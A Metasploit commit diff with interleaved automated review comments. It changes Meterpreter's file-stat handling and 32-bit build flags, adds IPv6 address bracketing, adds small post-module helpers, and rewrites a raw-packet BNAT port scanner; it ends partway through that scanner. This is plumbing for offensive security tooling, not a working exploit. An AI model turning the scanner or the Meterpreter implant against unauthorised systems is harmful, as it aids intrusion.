LPSTR baseDirectory = NULL;
- struct stat buf;
+ struct meterp_stat buf;
directory = packet_get_tlv_value_string(packet, TLV_TYPE_DIRECTORY_PATH);
@@ -150,7 +150,7 @@ DWORD request_fs_ls(Remote *remote, Packet *packet)
tempFile);
// Stat the file to get more information about it.
- if (stat(tempFile, &buf) >= 0)
+ if (fs_stat(tempFile, &buf) >= 0)
packet_add_tlv_raw(response, TLV_TYPE_STAT_BUF, &buf,
sizeof(buf));
4 external/source/meterpreter/source/extensions/stdapi/server/fs/file.c
@@ -257,7 +257,7 @@ DWORD request_fs_separator(Remote *remote, Packet *packet)
DWORD request_fs_stat(Remote *remote, Packet *packet)
{
Packet *response = packet_create_response(packet);
- struct stat buf;
+ struct meterp_stat buf;
LPCSTR filePath;
LPSTR expanded = NULL;
DWORD result = ERROR_SUCCESS;
@@ -273,7 +273,7 @@ DWORD request_fs_stat(Remote *remote, Packet *packet)
{
// Stat the file using the Microsoft stat wrapper so that we don't have to
// do translations
- if (stat(expanded, &buf) < 0)
+ if (fs_stat(expanded, &buf) < 0)
result = GetLastError();
else
packet_add_tlv_raw(response, TLV_TYPE_STAT_BUF, &buf,
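Review bot: The comment kept at the top of the second hunk, `// Stat the file using the Microsoft stat wrapper so that we don't have to do translations`, is stale now that the call is the portable `fs_stat()`; rewrite it as `// fs_stat() fills the platform-independent meterp_stat, so the client needs no per-OS translation`. `request_fs_stat` continues outside the hunk.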
29 external/source/meterpreter/source/extensions/stdapi/server/fs/fs.h
@@ -24,4 +24,33 @@ DWORD request_fs_sha1(Remote *remote, Packet *packet);
*/
DWORD request_fs_file_channel_open(Remote *remote, Packet *packet);
+
+
+/*
+ * Stat structures on Windows and various Unixes are all slightly different.
+ * Use this as a means of standardization so the client has some hope of
+ * understanding what the stat'd file really is.
+ */
+struct meterp_stat {
+ unsigned int st_dev;
+ unsigned short st_ino;
+ unsigned short st_mode;
+ unsigned short st_nlink;
+ unsigned short st_uid;
+ unsigned short st_gid;
+ unsigned short pad;
+ unsigned int st_rdev;
+ unsigned int st_size;
+ /*
+ * These are always 64-bits on Windows and usually 32-bits on Linux. Force
+ * them to be the same size everywhere.
+ */
+ unsigned long long st_atime;
+ unsigned long long st_mtime;
+ unsigned long long st_ctime;
+};
+
+int fs_stat(LPCSTR filename, struct meterp_stat *buf);
+
+
#endif
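Review bot: `struct meterp_stat` is sent verbatim over the wire (`packet_add_tlv_raw(..., &buf, sizeof(buf))` in file.c and dir.c), so its byte layout is part of the protocol, yet the header only explains the 64-bit times and says nothing about `pad`. By my count the fields sit at natural alignment with `st_atime` at offset 24, giving 48 bytes under both MSVC and gcc, and that is exactly what `pad` buys; say so: `/* pad keeps st_rdev 4-aligned and the 64-bit times 8-aligned, so natural alignment yields the same 48-byte layout on MSVC and gcc; sent raw, host byte order, as TLV_TYPE_STAT_BUF */`. A compile-time guard, `typedef char meterp_stat_size_check[sizeof(struct meterp_stat) == 48 ? 1 : -1];`, would catch a future field insertion that silently breaks the client parser.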
30 external/source/meterpreter/source/extensions/stdapi/server/fs/fs_util.c
@@ -1,4 +1,5 @@
#include "precomp.h"
+#include "fs.h"
/*
* Returns an expanded file path that must be freed
@@ -37,4 +38,31 @@ LPSTR fs_expand_path(LPCSTR regular)
strcpy(expandedFilePath, regular);
return expandedFilePath;
#endif
-}
+}
+
+/*
+ * Fills the platform-independent meterp_stat buf with data from the platform-dependent stat()
+ */
+int fs_stat(LPCSTR filename, struct meterp_stat *buf) {
+ struct stat sbuf;
+ int ret;
+
+ ret = stat(filename, &sbuf);
+
+ if (ret == 0) {
+ buf->st_dev = sbuf.st_dev;
+ buf->st_ino = sbuf.st_ino;
+ buf->st_mode = sbuf.st_mode;
+ buf->st_nlink = sbuf.st_nlink;
+ buf->st_uid = sbuf.st_uid;
+ buf->st_gid = sbuf.st_gid;
+ buf->st_rdev = sbuf.st_rdev;
+ buf->st_size = sbuf.st_size;
+ buf->st_atime = (unsigned long long)sbuf.st_atime;
+ buf->st_mtime = (unsigned long long)sbuf.st_mtime;
+ buf->st_ctime = (unsigned long long)sbuf.st_ctime;
+ return 0;
+ } else {
+ return ret;
+ }
+}
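Review bot: `fs_stat` narrows several fields silently: `st_size` is copied into an `unsigned int` (files of 4 GiB and larger wrap), and `st_ino`, `st_nlink`, `st_uid`, `st_gid` into `unsigned short`, so on Linux a uid above 65535 or a 64-bit inode number is reported wrongly to the client. Widening would change the wire layout of `meterp_stat`, so at minimum document it above the copies, `/* NOTE: meterp_stat fields are narrower than the host stat; st_size >= 4 GiB and ids/inodes >= 65536 wrap */`, and consider saturating instead of wrapping so oversize values are at least recognisable.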
37 external/source/meterpreter/source/openssl/build.sh
@@ -1,15 +1,34 @@
#!/bin/sh
-OSSL=openssl-0.9.8o
+set -e
-pushd $OSSL
-./Configure threads no-zlib no-krb5 386 --prefix=/tmp/out linux-msf no-dlfcn shared
-popd
+#OSSL=openssl-0.9.8o
+OSSL=openssl-0.9.8n
-export LIBC=../../bionic/libc
-export LIBM=../../bionic/libm
-export COMPILED=../../bionic/compiled
+cd $OSSL
+
+cat Configure | grep -v 'linux-msf' | sed -e 's#my %table=(#my %table=(\
+"linux-msf", "gcc:\\$\\${MSF_CFLAGS} -DL_ENDIAN -DTERMIO -Wall::\\$\\${MSF_CFLAGS} -D_REENTRANT::\\$\\${MSF_CFLAGS} -ldl:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}:dlfcn:linux-shared:\\$\\${MSF_CFLAGS} -fPIC::.so.\\$(SHLIB_MAJOR).\\$(SHLIB_MINOR)",\
+#;' > Configure-msf
+mv Configure-msf Configure
+chmod +x Configure
+
+./Configure --prefix=/tmp/out threads shared no-hw no-dlfcn no-zlib no-krb5 no-idea 386 linux-msf
+cd ..
+
+
+# These have to be relative to PWD because the OpenSSL make system builds in
+# multiple different levels of subdirs, so we can't just use ../../
+export LIBC=${PWD}/../bionic/libc
+export LIBM=${PWD}/../bionic/libm
+export COMPILED=${PWD}/../bionic/compiled
+
+export MSF_CFLAGS="-Os -Wl,--hash-style=sysv -march=i386 -nostdinc -nostdlib -fno-builtin -fpic -I ${LIBC}/include -I ${LIBC}/kernel/common/linux/ -I ${LIBC}/kernel/common/ -I ${LIBC}/arch-x86/include/ -I ${LIBC}/kernel/arch-x86/ -I${LIBC}/private -I${LIBM}/include -DPIC -Dwchar_t='char' -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -D_BYTE_ORDER=_LITTLE_ENDIAN -L${COMPILED} -lc"
+
+# We don't need all the random executable utilities that 'all' builds, just the
+# important .so files
+#make -C $OSSL depend clean all
+
+make -C $OSSL depend clean build_libs
-export CFLAGS="-I ${LIBC}/include -I ${LIBC}/kernel/common/linux/ -I ${LIBC}/kernel/common/ -I ${LIBC}/arch-x86/include/ -I ${LIBC}/kernel/arch-x86/ -I${LIBC}/private -fPIC -DPIC -nostdinc -nostdlib -Dwchar_t='char' -fno-builtin -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -I${LIBM}/include -L${COMPILED} -D_BYTE_ORDER=_LITTLE_ENDIAN -lc"
-make -C $OSSL depend clean all
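Review bot: `MSF_CFLAGS` here carries `-march=i386` but no `-m32`, while the equivalent `MSF_CFLAGS` in the top-level meterpreter Makefile in this commit has both and every other Makefile in the commit gains `-m32`; on a 64-bit host this script presumably builds 64-bit OpenSSL objects that the 32-bit metsrv cannot load. Add `-m32` after `-march=i386` on the export line. The version also diverges: this script now builds `openssl-0.9.8n` (the `0.9.8o` line is commented out) while the Makefile fetches and links `0.9.8o`, so the two build paths produce different libraries; if that is intentional it deserves a comment.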
11 external/source/meterpreter/source/server/rtld/Makefile
@@ -3,10 +3,10 @@ CFLAGS=-I${PWD}/hack
CFLAGS+= -I ../../bionic/libc/include -I ../../bionic/libc/kernel/common/linux/ -I ../../bionic/libc/kernel/common/ -I ../../bionic/libc/arch-x86/include/
CFLAGS+= -I ../../bionic/libc/kernel/arch-x86/ -I../../source/server/elf/headers -I../../bionic/libc/private -fPIC -DPIC
CFLAGS+= -nostdinc -nostdlib -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t" -DANDROID_X86_LINKER
-CFLAGS+= -ggdb
+#CFLAGS+= -ggdb
CFLAGS+= -DMETSRV_RTLD -D_BYTE_ORDER=_LITTLE_ENDIAN
-CFLAGS+= -march=i386
+CFLAGS+= -march=i386 -m32
OBJ=msflinker.o basic_libc.o syscall.o linker_format.o dlfcn.o zlib.o metsrv_rtld.o
@@ -14,9 +14,10 @@ all: msflinker msflinker.bin rtldtest
msflinker: $(OBJ)
gcc -Wl,-script=script -Wl,--hash-style=sysv $(CFLAGS) -o msflinker $(OBJ) -lgcc
+ strip msflinker
msflinker.bin: msflinker elf2bin.c
- gcc -o elf2bin elf2bin.c
+ gcc -march=i386 -m32 -o elf2bin elf2bin.c
./elf2bin msflinker msflinker.bin
libc.h: ../../bionic/compiled/libc.so
@@ -50,7 +51,7 @@ libpcap.h: ../../bionic/compiled/libpcap.so
metsrv_rtld.o: libc.h libm.h libcrypto.h libssl.h libmetsrv_main.h libsupport.h libpcap.h
rtldtest: rtldtest.c msflinker
- gcc -o rtldtest rtldtest.c -DEP=`objdump -f msflinker | grep start | awk '{ print $$3 }'`
+ gcc -march=i386 -m32 -o rtldtest rtldtest.c -DEP=`objdump -f msflinker | grep start | awk '{ print $$3 }'`
.s.o:
gcc $(CFLAGS) -c $<
@@ -61,5 +62,5 @@ rtldtest: rtldtest.c msflinker
clean:
rm -f libmetsrv_main.h libssl.h libcrypto.h libm.h libc.h libsupport.h
rm -f *.o
- rm -f msflinker msflinker.so
+ rm -f msflinker msflinker.bin msflinker.so
rm -f rtldtest elf2bin
4 external/source/meterpreter/source/server/rtld/elf2bin.c
@@ -60,7 +60,7 @@ int main(int argc, char **argv)
ehdr = (Elf32_Ehdr *)data;
phdr = (Elf32_Phdr *)(data + ehdr->e_phoff);
- printf("data @ %08x, mapping @ %08x\n", data, mapping);
+ printf("data @ %p, mapping @ %p\n", data, mapping);
for(i = 0; i < ehdr->e_phnum; i++, phdr++) {
if(phdr->p_type == PT_LOAD) {
@@ -71,7 +71,7 @@ int main(int argc, char **argv)
source = data + (phdr->p_offset & ~4095);
dest = mapping + ((phdr->p_vaddr - base) & ~4095);
len = phdr->p_filesz + (phdr->p_vaddr & 4095);
- printf("memcpy(%08x, %08x, %08x)\n", dest, source, len);
+ printf("memcpy(%p, %p, %08x)\n", dest, source, len);
memcpy(dest, source, len);
used += (phdr->p_memsz + (phdr->p_vaddr & 4095) + 4095) & ~4095 ;
8 external/source/meterpreter/source/server/rtld/linker_debug.h
@@ -29,7 +29,7 @@
#ifndef _LINKER_DEBUG_H_
#define _LINKER_DEBUG_H_
-#define LINKER_DEBUG 1
+#define LINKER_DEBUG 0
#include <stdio.h>
@@ -41,9 +41,9 @@
* or 0 to use stdout instead.
*/
#define LINKER_DEBUG_TO_LOG 0
-#define TRACE_DEBUG 1
-#define DO_TRACE_LOOKUP 1
-#define DO_TRACE_RELO 1
+#define TRACE_DEBUG 0
+#define DO_TRACE_LOOKUP 0
+#define DO_TRACE_RELO 0
/*********************************************************************
* You shouldn't need to modify anything below unless you are adding
2  external/source/meterpreter/workspace/Makefile
@@ -1,6 +1,6 @@
SUBDIRS = common metsrv ext_server_stdapi ext_server_sniffer ext_server_networkpug
-CFLAGS+= -march=i386
+CFLAGS+= -march=i386 -m32
subdirs:
for dir in $(SUBDIRS); do \
2  external/source/meterpreter/workspace/common/Makefile
@@ -18,7 +18,7 @@ CFLAGS+= -lgcc -L../../source/bionic/compiled
CFLAGS+= -D_UNIX -I$(SOURCEPATH) -I$(MALLOC_PATH) -I$(XOR_PATH) -DMALLOC_PRODUCTION -DPIC -I$(SSLPATH) -I$(STDLIBPATH) -I$(ZLIB_PATH)
CFLAGS+= -g -fPIC -Os -D_POSIX_C_SOURCE=200809 -D__BSD_VISIBLE=1 -D__XSI_VISIBLE=1
-CFLAGS+= -march=i386
+CFLAGS+= -march=i386 -m32
CC=gcc
2  external/source/meterpreter/workspace/ext_posix_sample/Makefile
@@ -15,7 +15,7 @@ CFLAGS+= -lgcc -L../../source/bionic/compiled -gstabs+
CFLAGS+= -fPIC -Os
CFLAGS+= -I../../source/extensions/stdapi/server -lc -lsupport
-CFLAGS+= -march=i386
+CFLAGS+= -march=i386 -m32
objects = test.o
2  external/source/meterpreter/workspace/ext_server_networkpug/Makefile
@@ -16,7 +16,7 @@ CFLAGS+= -lgcc -L../../source/bionic/compiled -gstabs+
CFLAGS+= -fPIC -Os
CFLAGS+= -I../../source/extensions/networkpug -lc -lpcap -lsupport -lmetsrv_main
-CFLAGS+= -march=i386
+CFLAGS+= -march=i386 -m32
#LDFLAGS= -fPIC -Bshareable -lc
2  external/source/meterpreter/workspace/ext_server_sniffer/Makefile
@@ -17,7 +17,7 @@ CFLAGS+= -fPIC -Os
CFLAGS+= -I../../source/extensions/networkpug -lc -lpcap -lsupport -lmetsrv_main
CFLAGS+= -I.
-CFLAGS+= -march=i386
+CFLAGS+= -march=i386 -m32
objects = sniffer.o
2  external/source/meterpreter/workspace/ext_server_stdapi/Makefile
@@ -15,7 +15,7 @@ CFLAGS+= -lgcc -L../../source/bionic/compiled -gstabs+
CFLAGS+= -fPIC -Os
CFLAGS+= -I../../source/extensions/stdapi/server -lc -lsupport -lmetsrv_main -lpcap
-CFLAGS+= -march=i386
+CFLAGS+= -march=i386 -m32
#LDFLAGS= -fPIC -Bshareable -lc
2  external/source/meterpreter/workspace/metsrv/Makefile
@@ -13,7 +13,7 @@ CFLAGS+= -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t"
CFLAGS+= -D_BYTE_ORDER=_LITTLE_ENDIAN
CFLAGS+= -lgcc -L../../source/bionic/compiled -gstabs+
-CFLAGS+= -march=i386
+CFLAGS+= -march=i386 -m32
OS=posix
OSVPATH=../../source/common/arch/$(OS):../../source/server/linux/
2  lib/msf/core/auxiliary/report.rb
@@ -23,7 +23,7 @@ def myworkspace
end
def inside_workspace_boundary?(ip)
- return if not framework.db.active
+ return true if not framework.db.active
allowed = myworkspace.allow_actions_on?(ip)
return allowed
end
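Review bot: `inside_workspace_boundary?` carries no comment explaining why it answers true when the database is inactive, and the scanners in this same commit now gate their reporting on it, so the intent should be written down; a line above the guard such as `# Without a database there is no workspace to enforce, so every address is treated as in scope.` does that. The guard reads more naturally as `return true unless framework.db.active`, and the trailing `allowed = ...` / `return allowed` pair can be the single expression `myworkspace.allow_actions_on?(ip)`.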
1  lib/msf/core/db.rb
@@ -262,6 +262,7 @@ def find_or_create_host(opts)
# :arch -- one of the ARCH_* constants
# :mac -- the host's MAC address
# :scope -- interface identifier for link-local IPv6
+ # :virtual_host -- the name of the VM host software, eg "VMWare", "QEMU", "Xen", etc.
#
def report_host(opts)
3  lib/msf/core/exploit/http/client.rb
@@ -668,7 +668,8 @@ def http_fingerprint(opts={})
info << " ( #{extras.join(", ")} )" if extras.length > 0
# Report here even if info is empty since the fact that we didn't
# return early means we at least got a connection and the service is up
- report_service(:host => rhost, :port => rport, :name => (ssl ? 'https' : 'http'), :info => info.dup)
+ ssl = datastore['SSL']
+ report_web_site(:host => rhost, :port => rport, :ssl => ssl, :vhost => vhost, :info => info.dup)
info
end
12 lib/msf/core/exploit/http/server.rb
@@ -293,6 +293,10 @@ def get_uri(cli=nil)
host = srvhost_addr
end
+ if Rex::Socket.is_ipv6?(host)
+ host = "[#{host}]"
+ end
+
if (ssl and datastore["SRVPORT"] == 443)
port = ''
elsif (!ssl and datastore["SRVPORT"] == 80)
@@ -331,7 +335,7 @@ def srvhost_addr
if (datastore['LHOST'])
host = datastore["LHOST"]
else
- if (datastore['SRVHOST'] == "0.0.0.0")
+ if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
if (sock and sock.peerhost)
host = Rex::Socket.source_address(sock.peerhost)
else
@@ -880,7 +884,11 @@ def on_request_uri(cli, request, headers={})
# Does not take SSL into account. For the reasoning behind this, see +exploit+.
#
def php_include_url(sock=nil)
- "http://#{srvhost_addr}:#{datastore['SRVPORT']}#{get_resource()}?"
+ host = srvhost_addr
+ if Rex::Socket.is_ipv6?(host)
+ host = "[#{host}]"
+ end
+ "http://#{host}:#{datastore['SRVPORT']}#{get_resource()}?"
end
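Review bot: The IPv6 bracket wrapping is now written out twice, in `get_uri` and in `php_include_url`, and will need a third copy the next time an address is interpolated into a URL. Since `srvhost_addr` may be wanted as a bare address by other callers, a small helper is safer than changing it: `def srvhost_url_host; host = srvhost_addr; Rex::Socket.is_ipv6?(host) ? "[#{host}]" : host; end`, after which both call sites collapse to one line. `get_uri`, `srvhost_addr` and `on_request_uri` all begin outside the hunks shown.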
13 lib/msf/core/exploit/postgres.rb
@@ -52,6 +52,11 @@ def postgres_login(args={})
ip = args[:server] || datastore['RHOST']
port = args[:port] || datastore['RPORT']
uri = "tcp://#{ip}:#{port}"
+
+ if Rex::Socket.is_ipv6?(ip)
+ uri = "tcp://[#{ip}]:#{port}"
+ end
+
verbose = args[:verbose] || datastore['VERBOSE']
begin
self.postgres_conn = Connection.new(db,username,password,uri)
@@ -155,7 +160,13 @@ def postgres_fingerprint(args={})
password = args[:password] || datastore['PASSWORD']
rhost = args[:server] || datastore['RHOST']
rport = args[:port] || datastore['RPORT']
+
uri = "tcp://#{rhost}:#{rport}"
+ if Rex::Socket.is_ipv6?(rhost)
+ uri = "tcp://[#{rhost}]:#{rport}"
+ end
+
+
verbose = args[:verbose] || datastore['VERBOSE']
begin
self.postgres_conn = Connection.new(db,username,password,uri)
@@ -234,7 +245,7 @@ def postgres_password
if datastore['PASSWORD'].to_s.size > 0
datastore['PASSWORD'].to_s
else
- Rex::Text.rand_text_english(rand(6)+2)
+ 'INVALID_' + Rex::Text.rand_text_alpha(rand(6))
end
end
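Review bot: Both `postgres_login` and `postgres_fingerprint` now assign `uri` twice, first unbracketed and then bracketed when the address is IPv6; building it once, `host = Rex::Socket.is_ipv6?(ip) ? "[#{ip}]" : ip` followed by `uri = "tcp://#{host}:#{port}"`, removes the double assignment and the run of blank lines left in the second hunk. In `postgres_password`, `rand(6)` can return 0, in which case the fallback is the bare string `'INVALID_'` with no random suffix; if a random tail is intended, `rand(6)+2` as the removed line had it keeps that guarantee. All three methods begin outside the hunks shown.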
4 lib/msf/core/model/host.rb
@@ -21,6 +21,10 @@ class Host < ActiveRecord::Base
validates_exclusion_of :address, :in => ['127.0.0.1']
validates_uniqueness_of :address, :scope => :workspace_id
+ def is_vm?
+ !!self.virtual_host
+ end
+
def attribute_locked?(attr)
n = notes.find_by_ntype("host.updated.#{attr}")
n && n.data[:locked]
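Review bot: `is_vm?` answers true for an empty `virtual_host` string, because `!!` only distinguishes nil and false; `!virtual_host.to_s.empty?` treats `""` like nil, which matches how `report_vm` in this commit discards blank names before storing them. The `is_` prefix is also against the usual Ruby predicate naming, so `vm?` would be the idiomatic name, with `is_vm?` kept as an alias if callers already depend on it. The `Host` class continues outside the hunk.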
12 lib/msf/core/post/common.rb
@@ -30,6 +30,18 @@ def cmd_exec(cmd, opts=nil, time_out=15)
return o
end
+ def report_vm(vm)
+ return unless session
+ return unless vm
+ vm_normal = vm.to_s.lstrip.strip
+ return if vm_normal.empty?
+ vm_data = {
+ :host => session.target_host,
+ :virtual_host => vm_normal
+ }
+ report_host(vm_data)
+ end
+
end
end
end
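Review bot: `vm.to_s.lstrip.strip` does redundant work, since `strip` already removes leading whitespace; `vm_normal = vm.to_s.strip` is equivalent. The new method also lacks a header comment explaining its three guard clauses; something like `# Records +vm+ (the virtualisation platform name) as the session target's virtual_host via report_host; does nothing without a session or with a blank name.` would do. `cmd_exec` above it starts outside the hunk.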
20 lib/msf/core/post/file.rb
@@ -38,7 +38,11 @@ def file_local_digestmd5(file2md5)
#
def file_remote_digestmd5(file2md5)
- chksum = Digest::MD5.hexdigest(read_file(file2md5))
+ data = read_file(file2md5)
+ chksum = nil
+ if data
+ chksum = Digest::MD5.hexdigest(data)
+ end
return chksum
end
@@ -61,7 +65,11 @@ def file_local_digestsha1(file2sha1)
#
def file_remote_digestsha1(file2sha1)
- chksum = Digest::SHA1.hexdigest(read_file(file2sha1))
+ data = read_file(file2sha1)
+ chksum = nil
+ if data
+ chksum = Digest::SHA1.hexdigest(data)
+ end
return chksum
end
@@ -84,7 +92,11 @@ def file_local_digestsha2(file2sha2)
#
def file_remote_digestsha2(file2sha2)
- chksum = Digest::SHA256.hexdigest(read_file(file2sha2))
+ data = read_file(file2sha2)
+ chksum = nil
+ if data
+ chksum = Digest::SHA256.hexdigest(data)
+ end
return chksum
end
@@ -156,7 +168,7 @@ def read_file_meterpreter(file_name)
begin
fd = session.fs.file.new(file_name, "rb")
rescue ::Rex::Post::Meterpreter::RequestError => e
- print_error("Failed to open file: #{e.class} : #{e}")
+ print_error("Failed to open file: #{file_name}")
return nil
end
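Review bot: The three `file_remote_digest*` methods now repeat the same read-then-hash body, differing only in the `Digest` class; a private helper, `def file_remote_digest(digest, path); data = read_file(path); data && digest.hexdigest(data); end`, lets each become a one-liner such as `file_remote_digest(Digest::MD5, file2md5)` while preserving the nil return when the read fails. In the last hunk the new message drops the exception class and text the old one printed; `print_error("Failed to open file: #{file_name} (#{e.class}: #{e})")` keeps the filename the commit adds without losing the reason. `read_file_meterpreter` starts outside the hunk.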
5 lib/msf/core/rpc/v10/rpc_module.rb
@@ -149,6 +149,11 @@ def rpc_execute(mtype, mname, opts)
end
+ def rpc_encode_formats
+ # Supported formats
+ Msf::Simple::Buffer.transform_formats + Msf::Util::EXE.to_executable_fmt_formats
+ end
+
def rpc_encode(data, encoder, options)
# Load supported formats
supported_formats = Msf::Simple::Buffer.transform_formats + Msf::Util::EXE.to_executable_fmt_formats
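Review bot: `rpc_encode` still recomputes the same `Msf::Simple::Buffer.transform_formats + Msf::Util::EXE.to_executable_fmt_formats` expression that the new `rpc_encode_formats` returns, so the two lists can drift apart; `supported_formats = rpc_encode_formats` in `rpc_encode` keeps a single definition. `rpc_encode` continues outside the hunk.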
31 lib/msf/ui/console/command_dispatcher/core.rb
@@ -940,7 +940,7 @@ def cmd_load(*args)
# Parse any extra options that should be passed to the plugin
args.each { |opt|
- k, v = opt.split(/=/)
+ k, v = opt.split(/\=/)
opts[k] = v if (k and v)
}
@@ -973,17 +973,28 @@ def cmd_load(*args)
# Tab completion for the load command
#
def cmd_load_tabs(str, words)
- return [] if words.length > 1
+ tabs = []
- begin
- return Dir.new(Msf::Config.plugin_directory).find_all { |e|
- path = Msf::Config.plugin_directory + File::SEPARATOR + e
- File.file?(path) and File.readable?(path)
- }.map { |e|
- e.sub!(/\.rb$/, '')
- }
- rescue Exception
+ if (not words[1] or not words[1].match(/^\//))
+ # then let's start tab completion in the scripts/resource directories
+ begin
+ [
+ Msf::Config.user_plugin_directory,
+ Msf::Config.plugin_directory
+ ].each do |dir|
+ next if not ::File.exist? dir
+ tabs += ::Dir.new(dir).find_all { |e|
+ path = dir + File::SEPARATOR + e
+ ::File.file?(path) and File.readable?(path)
+ }
+ end
+ rescue Exception
+ end
+ else
+ tabs += tab_complete_filenames(str,words)
end
+ return tabs.map{|e| e.sub(/.rb/, '')}
+
end
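Review bot: `tabs.map{|e| e.sub(/.rb/, '')}` uses an unescaped, unanchored pattern, so `.` matches any character and the first `xrb` anywhere in a name is removed (a plugin file named `carbon.rb` becomes `con.rb`); the removed code had the right pattern, `e.sub(/\.rb$/, '')`. The same map is applied to the `tab_complete_filenames` branch, where stripping `.rb` from arbitrary paths is presumably unintended, so the substitution belongs inside the plugin-directory branch only. `rescue Exception` with an empty body also hides every error including Interrupt; rescuing `StandardError` (or the `Errno::*` classes `Dir.new` raises) is the safer scope. `cmd_load` starts outside the first hunk.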
def cmd_route_help
2  lib/postgres/postgres-pr/connection.rb
@@ -171,7 +171,7 @@ def establish_connection(uri)
case u.scheme
when 'tcp'
@conn = Rex::Socket.create(
- 'PeerHost' => (u.host || DEFAULT_HOST),
+ 'PeerHost' => (u.host || DEFAULT_HOST).gsub(/[\[\]]/, ''), # Strip any brackets off (IPv6)
'PeerPort' => (u.port || DEFAULT_PORT),
'proto' => 'tcp'
)
2  modules/auxiliary/admin/natpmp/natpmp_map.rb
@@ -10,7 +10,7 @@ def initialize
super(
'Name' => 'NAT-PMP port mapper',
'Description' => 'Map (forward) TCP and UDP ports on NAT devices using NAT-PMP',
- 'Author' => 'jhart@spoofed.org',
+ 'Author' => 'Jon Hart <jhart[at]spoofed.org>',
'License' => MSF_LICENSE
)
11 modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb
@@ -71,9 +71,14 @@ def run
lfd = nil
if offset != 0
- # Turns out ruby's implementation of seek with "ab" mode is all kind of busted.
- lfd = ::File.open(datastore['LPATH'], "r+b")
- lfd.seek(offset)
+ begin
+ # Turns out ruby's implementation of seek with "ab" mode is all kind of busted.
+ lfd = ::File.open(datastore['LPATH'], "r+b")
+ lfd.seek(offset)
+ rescue Errno::ENOENT
+ print_error("Unable to open existing dump! Writing a new file instead of resuming...")
+ lfd = ::File.open(datastore['LPATH'], "wb")
+ end
else
lfd = ::File.open(datastore['LPATH'], "wb")
end
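Review bot: After the new `rescue Errno::ENOENT` falls back to a fresh `"wb"` file, `offset` still holds the non-zero resume value, so if the dump loop below (outside the hunk) uses it to skip the first `offset` bytes, the new file will start part-way through the memory image; adding `offset = 0` in the rescue keeps the fallback consistent with the "writing a new file" message. Only ENOENT is handled, so an unreadable existing file (EACCES) still aborts with a raw exception. The `::File.open(datastore['LPATH'], "wb")` call is now written twice and could be hoisted into a single fallback path. `run` starts outside the hunk.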
113 modules/auxiliary/bnat/bnat_scan.rb
@@ -13,15 +13,16 @@
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Scanner
+ include Msf::Exploit::Capture
def initialize
super(
'Name' => 'BNAT Scanner',
'Version' => '$Revision$',
'Description' => %q{
- This module is a scanner which can detect Bad NAT (network address translation)
+ This module is a scanner which can detect Broken NAT (network address translation)
implementations, which could result in a inability to reach ports on remote
- machines. Typically, these ports will appear in nmap scans as 'filtered'.
+ machines. Typically, these ports will appear in nmap scans as 'filtered'/'closed'.
},
'Author' =>
[
@@ -35,68 +36,72 @@ def initialize
[ 'URL', 'http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels'],
]
)
+
register_options(
[
- OptString.new('PORTS', [true, "Ports to scan (e.g. 22-25,80,110-900)", "1-10000"]),
- OptString.new('INTERFACE', [true, 'The interface connected to the network', 'eth0']),
+ OptString.new('PORTS', [true, "Ports to scan (e.g. 22-25,80,110-900)", "21,22,23,80,443"]),
+ OptString.new('INTERFACE', [true, "The name of the interface", "eth0"]),
+ OptInt.new('TIMEOUT', [true, "The reply read timeout in milliseconds", 500])
],self.class)
- end
-
- def run_host(ip)
- synack_hash = {}
- synack_array = []
- ftypes = %w{windows, linux, freebsd}
- @flavor = ftypes[rand(ftypes.length)] # we can randomize our flavor
-
- #Start Capture for !IP
- pcap = PacketFu::Capture.new(
- :iface => datastore['INTERFACE'],
- :start => true,
- :filter => "tcp and not host #{ip} and tcp[13] == 18")
-
- scan = Thread.new do
- iface = PacketFu::Utils.whoami?(:iface => datastore['INTERFACE'])
- ports = Rex::Socket.portspec_crack(datastore['PORTS'])
- tcp_pkt = PacketFu::TCPPacket.new(:config => iface, :timeout => 0.1, :flavor => @flavor)
- tcp_pkt.ip_daddr = ip
- tcp_pkt.tcp_flags.syn = 1
+ deregister_options('FILTER','PCAPFILE','RHOST','SNAPLEN')
- #tcp_pkt.tcp_win = 14600
- # should be handled by the flavor config option
- #tcp_pkt.tcp_options = "MSS:1460,SACKOK,TS:3853;0,NOP,WS:5"
+ end
- ports.each do |port|
- tcp_pkt.tcp_src = rand(64511)+1024
- tcp_pkt.tcp_dst = port
- tcp_pkt.recalc
- tcp_pkt.to_w
- select(nil, nil, nil, 0.075)
- tcp_pkt.to_w
- end
- end
+ def probe_reply(pcap, to)
+ reply = nil
+ begin
+ Timeout.timeout(to) do
+ pcap.each do |r|
+ pkt = PacketFu::Packet.parse(r)
+ next unless pkt.is_tcp?
+ reply = pkt
+ break
+ end
+ end
+ rescue Timeout::Error
+ end
+ return reply
+ end
- analyze = Thread.new do
- loop do
- pcap.stream.each do |pkt|
- packet = PacketFu::Packet.parse(pkt)
- synack_hash = { :ip => packet.ip_saddr.to_s, :port => packet.tcp_sport.to_s}
- synack_array.push(synack_hash)
- end
- end
- end
+ def generate_probe(ip)
+ ftypes = %w{windows, linux, freebsd}
+ @flavor = ftypes[rand(ftypes.length)]
+ config = PacketFu::Utils.whoami?(:iface => datastore['INTERFACE'])
+ p = PacketFu::TCPPacket.new(:config => config)
+ p.ip_daddr = ip
+ p.tcp_flags.syn = 1
+ return p
+ end
- # Wait for the scan to complete
- scan.join
- select(nil, nil, nil, 0.05)
- analyze.terminate
+ def run_host(ip)
+
+ open_pcap
+
+ to = (datastore['TIMEOUT'] || 500).to_f / 1000.0
- # Clean up any duplicate responses received
- synack_array = synack_array.uniq
+ p = generate_probe(ip)
+ pcap = self.capture
- synack_array.each do |synack|
- print_status "[BNAT Response] Request: #{ip} Response: #{synack[:ip]} Port: #{synack[:port]}"
- end
+ ports = Rex::Socket.portspec_crack(datastore['PORTS'])
+
+ ports.each_with_index do |port,i|
+ p.tcp_dst = port
+ p.tcp_src = rand(64511)+1024
+ p.tcp_seq = rand(64511)+1024
+ p.recalc
+
+ ackbpf = "tcp [8:4] == 0x#{(p.tcp_seq + 1).to_s(16)}"
